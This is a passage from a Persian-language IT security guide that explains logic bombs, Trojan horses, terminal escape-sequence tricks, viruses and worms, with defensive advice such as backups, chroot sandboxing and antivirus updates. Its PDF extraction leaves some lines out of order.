ﺑﺎ ﻇﺮﺍﻓﺖ ﺯﻳﺎﺩﻱ ﭘﻨﻬﺎﻥ ﻛﺮﺩ .ﺩﺭﻧﺘﻴﺠﻪ ﺍﮔﺮ ﺍﺟﺎﺯﻩ ﺩﻫﻴﺪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺩﺳﺘﻜﺎﺭﻱ ﺷﻮﺩ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﻳﮕﺮ ﻫﺮﮔـﺰ ﻧﺘﻮﺍﻧﻴـﺪ ﻣﺘﻮﺟـﻪ ﺗﻐﻴﻴـﺮﺍﺕ
ﺑﻮﺟﻮﺩﺁﻣﺪﻩ ﺷﻮﻳﺪ.
ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﺩ .ﺍﺗﻤﺎﻡ ﺯﻣﺎﻥ ﺣﻴﺎﺕ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﻲ ﺍﺳﺖ ﻛﻪ ﭘﺲ ﺍﺯ ﻳﻚ ﻣﺪﺕ ﺯﻣﺎﻥ ﻣﺸﺨﺺ ،ﺍﮔﺮ ﻋﻤﻞ ﺧﺎﺻﻲ ﻣﺎﻧﻨﺪ ﭘﺮﺩﺍﺧﺖ ﻫﺰﻳﻨـﺔ
ﻻ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﻛﺎﺭ ﮔﺬﺍﺷﺘﻪ ﻣـﻲﺷـﻮﺩ ﻛـﻪ ﺩﺭ ﻣﺮﺣﻠـﺔ ﻳﻚ ﮔﻮﺍﻫﻲ ﺍﻧﺠﺎﻡ ﻧﺸﻮﺩ ،ﺑﺮﻧﺎﻣﻪ ﺩﻳﮕﺮ ﺍﺟﺮﺍ ﻧﻤﻲﮔﺮﺩﺩ .ﺍﺗﻤﺎﻡ ﺯﻣﺎﻥ ﺣﻴﺎﺕ ﻣﻌﻤﻮ ﹰ
ﺁﺯﻣﻮﻥ ﻧﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺗﻮﺯﻳﻊ ﺩﺭ ﺑﺎﺯﺍﺭ ﻣﺼﺮﻑ ﻫﺴﺘﻨﺪ؛ ﺗﺎ ﻛﺎﺭﺑﺮﺍﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺁﺯﻣﺎﻳﺸﻲ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﻧﺴﺨﻪﻫﺎﻱ ﺟﺪﻳﺪﺗﺮ ﺍﺭﺗﻘﺎ ﺩﻫﻨـﺪ ﻳـﺎ ﻳـﻚ
ﻧﺴﺨﺔ ﺭﺳﻤﻲ ﺧﺮﻳﺪﺍﺭﻱ ﻧﻤﺎﻳﻨﺪ.
ﻣﺤﺎﻓﻈﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﺑﻤﺒﻬﺎﻱ ﻣﻨﻄﻘﻲ ﻣﺨﺮﺏ ﻧﻴﺰ ﻣﺸﺎﺑﻪ ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ ﺍﺳﺖ :ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺭﺍ ﺑﺪﻭﻥ ﺧﻮﺍﻧﺪﻥ ﻭ ﺗـﺴﺖ ﻛﺎﻣـﻞ ﻧـﺼﺐ ﻧﻜﻨﻴـﺪ.
ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴﺪ ﺗﺎ ﺩﺭﺻﻮﺭﺕ ﺑﺮﻭﺯ ﻫﺮ ﺍﺗﻔﺎﻕ ﻧﺎﮔﻮﺍﺭ ،ﺑﺘﻮﺍﻧﻴﺪ ﺩﺍﺩﻩﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﺎﺯﮔﺮﺩﺍﻧﻴﺪ.
ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ
ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍﻱ ﺩﻧﻴﺎﻱ ﻣﺪﺭﻥ -ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺍﺯ ﻧﺎﻣﺸﺎﻥ ﭘﻴﺪﺍﺳﺖ -ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﺷﺒﻴﻪ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻳﻲ ﻛـﻪ ﻛـﺎﺭﺑﺮ ﺍﺯ ﺁﻧﻬـﺎ ﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲﻛﻨﺪ؛ ﻣﺜﻞ ﻳﻚ ﭘﺮﺩﺍﺯﺓ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ،ﻳﻚ ﺑﺎﺯﻱ ،ﻳﺎ ﻳﻚ ﻭﻳﺮﺍﻳﺸﮕﺮ .ﺩﺭﺣﺎﻟﻴﻜـﻪ ﺑﺮﻧﺎﻣـﻪ ﺩﺭ ﻇـﺎﻫﺮ ﻛـﺎﺭ ﻣـﻮﺭﺩ ﻧﻈـﺮ ﻛـﺎﺭﺑﺮ ﺭﺍ ﺍﻧﺠـﺎﻡ
ﻼ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﺎﺭﺑﺮ ﮔﻤﺎﻥ ﻛﻨﺪ ﻛﻪ ﻳـﻚ ﺑـﺎﺯﻱ ﻣﻲﺩﻫﺪ ،ﺑﺪﻭﻥ ﺍﻃﻼﻉ ﻛﺎﺭﺑﺮ ﺑﻪ ﻛﺎﺭ ﺩﻳﮕﺮﻱ ﺑﺮﺧﻼﻑ ﻫﺪﻑ ﺍﻋﻼﻡﺷﺪﻩ ﻧﻴﺰ ﻣﻲﭘﺮﺩﺍﺯﺩ .ﻣﺜ ﹰ
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٤٢٠
ﺍﺟﺮﺍ ﻛﺮﺩﻩ ﺍﺳﺖ ﻭ ﺑﺮﻧﺎﻣﻪ ﻧﻴﺰ ﺳﺆﺍﻻﺗﻲ ﻣﺎﻧﻨﺪ "ﺩﻭﺳﺖ ﺩﺍﺭﻳﺪ ﭼﻪ ﻧﺎﻣﻲ ﺭﻭﻱ ﺑﺎﺯﻳﻜﻦ ﺑﮕﺬﺍﺭﻳﺪ؟" ﻳﺎ "ﺩﺭ ﭼﻪ ﺳـﻄﺤﻲ ﺍﺯ ﺳـﺨﺘﻲ ﻣـﻲﺧﻮﺍﻫﻴـﺪ
ﻼ ﺩﺭﺣﺎﻝ ﭘﺎﻙﻛﺮﺩﻥ ﻓﺎﻳﻠﻬﺎ ﻭ ﻗﺎﻟﺐﺑﻨﺪﻱ ﻣﺠﺪﺩ ﻳﻚ ﺩﻳﺴﻚ ﺑﺎﺷﺪ ،ﻭ ﻳﺎ ﺍﺳﻨﺎﺩ ﻣﺤﺮﻣﺎﻧﻪﺍﻱ ﺭﺍ ﺑـﻪ ﻳـﻚ ﺑﺎﺯﻱ ﻛﻨﻴﺪ؟" ﺍﺯ ﻭﻱ ﺑﭙﺮﺳﺪ ،ﺍﻣﺎ ﻋﻤ ﹰ
ﻻ ﺑـﺎ
ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺩﺭ ﺁﻧﺴﻮﻱ ﺩﻧﻴﺎ ﺑﻔﺮﺳﺘﺪ .ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ ﺩﺭ ﺑﻌﻀﻲ ﻣﺤﻴﻄﻬﺎ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩ ﻫﺴﺘﻨﺪ .ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨـﺮﺏ ﻣﻌﻤـﻮ ﹰ
ﺣﻘﻪﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺩﺭ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻧﻔﻮﺫﮔﺮﺍﻥ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﻣﻲﺷﻮﻧﺪ ﻭ ﺑﻌﻨﻮﺍﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺑﻪﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪﺷﺪﻩ ﻣﻴﺎﻥ ﻛـﺎﺭﺑﺮﺍﻥ ﺗﻮﺯﻳـﻊ
ﻣﻲﮔﺮﺩﻧﺪ.
ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ ﺩﺭ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻭ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻧﺼﺐﻛﻨﻨﺪﻩ ﻧﻴﺰ ﺩﻳﺪﻩ ﺷﺪﻩﺍﻧﺪ .ﺑﺮﺧﻲ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﭘﻮﺳﺘﻪ )ﺑﺨـﺼﻮﺹ ﻓﺎﻳﻠﻬـﺎﻱ ،(sharﻓﺎﻳﻠﻬـﺎﻱ
،VBSﻓﺎﻳﻠﻬﺎﻱ ،awkﻓﺎﻳﻠﻬﺎﻱ ،perlﻗﻄﻌﻪﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ،sedﻓﺎﻳﻠﻬـﺎﻱ ،TeXﻓﺎﻳﻠﻬـﺎﻱ ،PostScriptﻧﺎﻣـﻪﻫـﺎﻱ ﺑـﺎ ﺭﻣﺰﮔـﺬﺍﺭﻱ
،MIMEﻭ ﺻﻔﺤﺎﺕ ﻭﺏ ،ﻫﻤﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺣﺎﻭﻱ ﺩﺳﺘﻮﺭﺍﺗﻲ ﺑﺎﺷﻨﺪ ﻛﻪ ﻣﺸﻜﻼﺕ ﻧﺎﺧﻮﺍﺳﺘﻪﺍﻱ ﺍﻳﺠـﺎﺩ ﻧﻤﺎﻳﻨـﺪ .ﺣﺘـﻲ ﻓﺎﻳﻠﻬـﺎﻱ ﻣﺘﻨـﻲ ﻧﻴـﺰ
ﻣﻲﺗﻮﺍﻧﻨﺪ ﺧﻄﺮﻧﺎﻙ ﺑﺎﺷﻨﺪ .ﺑﻌﻀﻲ ﻭﻳﺮﺍﻳﺸﮕﺮﻫﺎ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﺩﺍﺭﻧﺪ ﻛﻪ ﺩﺭ ﭼﻨﺪ ﺧﻂ ﺍﺑﺘﺪﺍﻳﻲ ﻳﺎ ﺍﻧﺘﻬﺎﻳﻲ ﻓﺎﻳﻞ ،ﺩﺳﺘﻮﺭﺍﺗﻲ ﺑـﺮﺍﻱ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ
ﺧﻮﺩﻛﺎﺭ ﻭﻳﺮﺍﻳﺸﮕﺮ ﺩﺭ ﻓﺎﻳﻠﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻥ ﻗﺮﺍﺭ ﺩﻫﻨﺪ) .ﺑﺮﺍﻱ ﺍﻃﻼﻉ ﺍﺯ ﺭﻭﺵ ﻏﻴﺮﻓﻌﺎﻝ ﻛﺮﺩﻥ ﺍﻳﻦ ﻭﻳﮋﮔﻲ ﺑﻪ ﻣﺴﺘﻨﺪﺍﺕ ﻭﻳﺮﺍﻳﺸﮕﺮ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﺓ ﺧـﻮﺩ
ﺭﺟﻮﻉ ﻛﻨﻴﺪ(.
ﺍﮔﺮ ﺑﺮﺍﻱ ﺍﻭﻟﻴﻦ ﺑﺎﺭ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﺍﻱ ﺭﺍ ﺍﺟﺮﺍ ﻣﻲﻛﻨﻴﺪ ﻳﺎ ﻓﺎﻳﻠﻬﺎﻳﻲ ﺭﺍ ﻏﻴﺮﻓﺸﺮﺩﻩ ﻣﻲﻧﻤﺎﻳﻴﺪ ،ﺑﻬﺘﺮ ﺍﺳﺖ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺭﻭﻱ ﻳﻚ ﻣﺎﺷـﻴﻦ ﻣﺠـﺰﺍ ﺩﺭ
ﻗﺮﻧﻄﻴﻨﻪ ﻳﺎ ﺩﺭ ﻣﺤﻴﻄﻲ ﻣﺤﺪﻭﺩ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ﺗﺎ ﺟﻠﻮﻱ ﺩﺳﺘﺮﺳﻲ ﺁﻥ ﺑﺴﺘﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺭﺍ ﺑﻪ ﻓﺎﻳﻠﻬﺎ ﻭ ﺷـﺎﺧﻪﻫـﺎﻱ ﺧـﺎﺭﺝ ﺍﺯ ﻣﺤـﻴﻂ ﻛـﺎﺭﻱ
ﺧﻮﺩﺵ ﺑﮕﻴﺮﻳﺪ )ﺩﺭ Unixﺍﻳﻦ ﻛﺎﺭ ﺑﺎ ﺩﺳﺘﻮﺭ ﺳﻴﺴﺘﻤ ﹺﻲ )( chrootﺍﻧﺠﺎﻡ ﭘﺬﻳﺮ ﺍﺳﺖ(.
ﺷﻜﻞ ﺩﻳﮕﺮﻱ ﺍﺯ ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺑﻬﺮﻩﮔﻴﺮﻱ ﺍﺯ ﺩﺳﺘﻮﺭ ﺍﺭﺳﺎﻝ ﺑﻠﻮﻛﻲ ٣٢٧ﻳﺎ ﺣﺎﻻﺕ ﺑـﺎﺯﮔﻮ ٣٢٨ﺩﺭ ﭘﺎﻳﺎﻧـﻪﻫـﺎﻱ ﺳـﺮﻳﺎﻝ ﻣﺤـﺼﻮﻝ
ﺩﻫﻪﻫﺎﻱ ١٩٧٠ﻭ ) ١٩٨٠ﻛﻪ ﺗﻮﺳﻂ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺷﺒﻴﻪﺳﺎﺯ ﭘﺎﻳﺎﻧﻪ ﺍﺯ ﺟﻤﻠﻪ HyperTerminalﻣﺤﺼﻮﻝ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺷﺒﻴﻪﺳﺎﺯﻱ ﺷـﺪﻩﺍﻧـﺪ( ﻛـﺎﺭ
ﻛﻨﻨﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﮔﻮﻧﻪﻫﺎﻱ ﭘﺎﻳﺎﻧﻪﻫﺎ ﺗﻨﻈﻴﻤﺎﺗﻲ ﺩﺍﺭﻧﺪ ﻛﻪ ﻃﺒﻖ ﺁﻧﻬﺎ ﻳﻚ ﺭﺷﺘﻪ ﻛﺎﺭﺍﻛﺘﺮﻫﺎﻱ ﺧﺎﺹ ﻛﻨﺘﺮﻟﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎﻋﺚ ﺷـﻮﺩ ﻛـﻪ ﻳـﻚ
ﺩﺳﺘﻮﺭ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻳﺪ؛ ﺁﻧﭽﻨﺎﻥ ﻛﻪ ﮔﻮﻳﻲ ﺁﻥ ﺩﺳﺘﻮﺭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺻﻔﺤﻪﻛﻠﻴﺪ ﻭﺍﺭﺩ ﺷﺪﻩ ﺍﺳﺖ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻳﻚ ﺩﺳـﺘﻮﺭ ﻛـﻪ ﺩﺭﻭﻥ
ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎﻋﺚ ﺷﻮﺩ ﭘﺎﻳﺎﻧﻪ ﻳﻚ ﻓﺮﻣﺎﻥ ﻣﺒﻨﻲ ﺑﺮ "ﭘﺎﻙ ﻛﺮﺩﻥ ﻫﻤـﺔ ﻓﺎﻳﻠﻬـﺎ ﻭ ﺧـﺮﻭﺝ ﺍﺯ ﺳﻴـﺴﺘﻢ" ﺑـﻪ
ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺑﻔﺮﺳﺘﺪ ،ﻭ ﺳﭙﺲ ﻳﻚ ﺭﺷﺘﻪ ﺑﺮﺍﻱ "ﭘﺎﻙ ﻛﺮﺩﻥ ﺻﻔﺤﻪ" ﻧﻴﺰ ﺑﺮﺍﻱ ﺧﻮﺩ ﭘﺎﻳﺎﻧﻪ ﺍﺭﺳﺎﻝ ﻛﻨﺪ .ﺍﻳﻦ ﻭﻳﮋﮔﻲ ﺭﺍ ﺩﺭ ﭘﺎﻳﺎﻧﻪ ﻳﺎ ﺑﺮﻧﺎﻣـﺔ
ﺷﺒﻴﻪﺳﺎﺯ ﺧﻮﺩ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ.
ﻭﻳﺮﻭﺳﻬﺎ
ﻳﻚ ﻭﻳﺮﻭﺱ ﻭﺍﻗﻌﻲ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﺳﺎﻳﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﺟﺮﺍﻳﻲ ﺍﺿﺎﻓﻪ ﻣﻲﺷﻮﺩ .ﺩﺭﻧﺘﻴﺠﻪ ﻫﺮﮔـﺎﻩ ﺑﺮﻧﺎﻣـﺔ ﻋـﺎﺩﻱ ﺍﺟـﺮﺍ ﺷـﻮﺩ ،ﺑﺮﻧﺎﻣـﺔ
ﻭﻳﺮﻭﺱ ﻧﻴﺰ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﻣﻲﺁﻳﺪ .ﺑﺮﻧﺎﻣﺔ ﻭﻳﺮﻭﺱ ﺑﺎﻋﺚ ﺍﺿﺎﻓﻪ ﺷﺪﻥ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺧﻮﺩﺵ ﺩﺭ ﻳﻚ ﻳﺎ ﭼﻨﺪ ﺑﺮﻧﺎﻣﺔ ﺩﻳﮕﺮ ﻣﻲﮔﺮﺩﺩ .ﻭﻳﺮﻭﺳـﻬﺎ
ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺴﺘﻘﻠﻲ ﺑﺎﺷﻨﺪ -ﻳﻌﻨﻲ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﺍﺟﺮﺍ ﺷﻮﻧﺪ ،ﺑﻠﻜﻪ ﺑﺮﺍﻱ ﺍﺟﺮﺍ ﻧﻴﺎﺯ ﺑـﻪ ﻳـﻚ ﻣﻴﺰﺑـﺎﻥ ﺩﺍﺭﻧـﺪ ﺗـﺎ ﺑﻌﻨـﻮﺍﻥ
ﺑﺨﺸﻲ ﺍﺯ ﺁﻥ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻳﻨﺪ.
ﺗﻘﺮﻳﺒﹰﺎ ﺗﻤﺎﻡ ﻭﻳﺮﻭﺳﻬﺎ ،ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺩﺍﺭﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﭘﺮﻛﺎﺭﺑﺮﺩ )ﻣﺎﻧﻨـﺪ Microsoft Windows ،MS DOSﻭ (Apple MacOSﺭﺍ
ﻫﺪﻑ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ .ﻭﻳﺮﻭﺳﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻳﻲ ﻛﻪ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻛﻤﻲ ﺩﺍﺭﻧﺪ )ﻣﺎﻧﻨﺪ DOSﻭ MacOSﻧﺴﺨﻪﻫﺎﻱ ﻗﺒـﻞ ﺍﺯ
ﻭﻳﺮﺍﻳﺶ (١٠ﻭ ﻫﻤﭽﻨﻴﻦ ﺁﻧﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﭘﻴﺸﺮﻓﺘﻪﺍﻱ ﺑﺮﺧﻮﺭﺩﺍﺭﻧـﺪ )ﻣﺜـﻞ Windows NTﻭ (Windows XPﺍﻧﺘـﺸﺎﺭ ﻳﺎﺑﻨـﺪ.
ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ Unixﻫﻢ ﻭﻳﺮﻭﺳﻬﺎﻳﻲ ﻧﻮﺷﺘﻪ ﺷـﺪﻩ ﺍﺳـﺖ .ﺣﺘـﻲ ﻭﻳﺮﻭﺳـﻬﺎﻳﻲ ﻧﻮﺷـﺘﻪ ﺷـﺪﻩﺍﻧـﺪ ﻛـﻪ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﻫـﻢ ﺳﻴـﺴﺘﻤﻬﺎﻱ
Windowsﻭ ﻫﻢ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ Unixﺭﺍ ﺁﻟﻮﺩﻩ ﺳﺎﺯﻧﺪ .ﻭﻳﺮﻭﺳﻬﺎﻳﻲ ﻛﻪ boot sectorﺭﺍ ﺁﻟﻮﺩﻩ ﻣﻲﻛﻨﻨﺪ ،ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺑﺘﻮﺍﻧﻨـﺪ
ﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ Windowsﺁﻟـﻮﺩﻩ ﻳﻚ ﺩﻳﺴﻜﺖ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺭﺍ ﺁﻟﻮﺩﻩ ﻛﻨﻨﺪ ،ﻣﻲﺗﻮﺍﻧﻨﺪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ BSDﻳﺎ Linuxﺭﺍ ﻧﻴﺰ ﺑﺮﺍﺣﺘ ﹺ
ﻧﻤﺎﻳﻨﺪ )ﻫﺮﭼﻨﺪ ﺍﻳﻦ ﺁﻟﻮﺩﮔﻲ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑﻴﺶ ﺍﺯ ﺁﻥ ﮔﺴﺘﺮﺵ ﻳﺎﺑﺪ(.
ﻭﻳﺮﻭﺳﻬﺎ ﺍﺑﺰﺍﺭ ﻗﺪﺭﺗﻤﻨﺪﻱ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻤﺎﻥ ﻫﺴﺘﻨﺪ .ﻫﺮﭼﻨﺪ ﻫﺮ ﻛﺎﺭﻱ ﻛﻪ ﺗﻮﺳﻂ ﻭﻳﺮﻭﺱ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ ﺍﺯ ﺭﺍﻫﻬﺎﻱ ﺩﻳﮕﺮ ﻧﻴﺰ ﻗﺎﺑـﻞ ﺍﻧﺠـﺎﻡ
ﺍﺳﺖ ،ﻭﻟﻲ ﻭﻳﺮﻭﺳﻬﺎ ﻗﺎﺩﺭﻧﺪ ﺑﺪﻭﻥ ﺩﺧﺎﻟﺖ ﻳﺎ ﻫﺪﺍﻳﺖ ﻣﻬﺎﺟﻢ ﮔﺴﺘﺮﺵ ﻳﺎﺑﻨﺪ ﻭ ﺣﺘﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﻣﻨﺎﻃﻘﻲ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﻨﺪ ﻛـﻪ ﻣﻬـﺎﺟﻢ
ﺷﺨﺼﹰﺎ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺁﻧﻬﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﺑﺮﺍﻱ ﻣﺤﺎﻓﻈﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﻭﻳﺮﻭﺳﻬﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻫﻤـﺎﻥ ﻓﻨـﻮﻥ ﻣﻘﺎﺑﻠـﻪ ﺑـﺎ ﺩﺭﺑﻬـﺎﻱ ﻣﺨﻔـﻲ ﻭ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﺭﻣﺰﺷـﻜﻦ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ .ﺩﺭ
ﺳﻴﺴﺘﻤﻬﺎﻱ Intelﻧﺒﺎﻳﺪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﻳﺴﻜﻬﺎﻱ ﻏﻴﺮ ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻧﻤﺎﻳﻴﺪ .ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺿـﺪﻭﻳﺮﻭﺱ
ﻳﻚ ﻧﻴﺎﺯ ﺍﺳﺎﺳﻲ ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺧﺎﻧﮕﻲ ﻭ ﺷﺮﻛﺘﻬﺎ ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﻧﺪ ،ﺍﻣﺎ ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﺗﻌـﺪﺍﺩ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﻓﺎﻗـﺪ ﺿـﺪﻭﻳﺮﻭﺱ ﺑـﻴﺶ ﺍﺯ
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﺠﻬﺰ ﺑﻪ ﺁﻥ ﺍﺳﺖ .ﻣﺴﺌﻠﻪ ﺩﻳﮕﺮﻱ ﻛﻪ ﺑﻪ ﻫﻤﻴﻦ ﺍﻧﺪﺍﺯﻩ ﻧﮕﺮﺍﻥﻛﻨﻨﺪﻩ ﻣﻲﺑﺎﺷﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛـﻪ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻛـﺴﺎﻧﻴﻜﻪ ﻧـﺮﻡﺍﻓـﺰﺍﺭ
ﻼ ﻛـﺎﺭﺍﻳﻲ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺧـﻮﺩ ﺭﺍ ﺩﺭ ﻣﻘﺎﺑـﻞ
ﺿﺪﻭﻳﺮﻭﺱ ﺗﻬﻴﻪ ﻣﻲﻛﻨﻨﺪ ،ﻧﺸﺎﻧﻬﺎﻱ ﻭﻳﺮﻭﺱ ﺁﻧﺮﺍ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻧﻤﻲﻧﻤﺎﻳﻨﺪ ،ﻭ ﻋﻤـ ﹰ
ﺗﻬﺪﻳﺪﺍﺕ ﺟﺪﻳﺪ ﺑﻪ ﺣﺪﺍﻗﻞ ﻣﻲﺭﺳﺎﻧﻨﺪ.
ﻛﺮﻣﻬﺎ
ﻛﺮﻣﻬﺎ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻄﻮﺭ ﻣﺴﺘﻘﻞ ﺍﺟﺮﺍ ﺷﻮﻧﺪ ﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺗﺼﺎﻻﺕ ﺷﺒﻜﻪ ﺍﺯ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕﺮ ﻣﻨﺘﻘﻞ
ﺷﻮﻧﺪ؛ ﻳﺎ ﺣﺘﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﻗﺴﻤﺘﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻳﻚ ﻛﺮﻡ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﺍﺟﺮﺍ ﺷﻮﻧﺪ .ﻛﺮﻣﻬﺎ ﺳﺎﻳﺮ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺭﺍ ﺗﻐﻴﻴﺮ ﻧﻤـﻲﺩﻫﻨـﺪ،
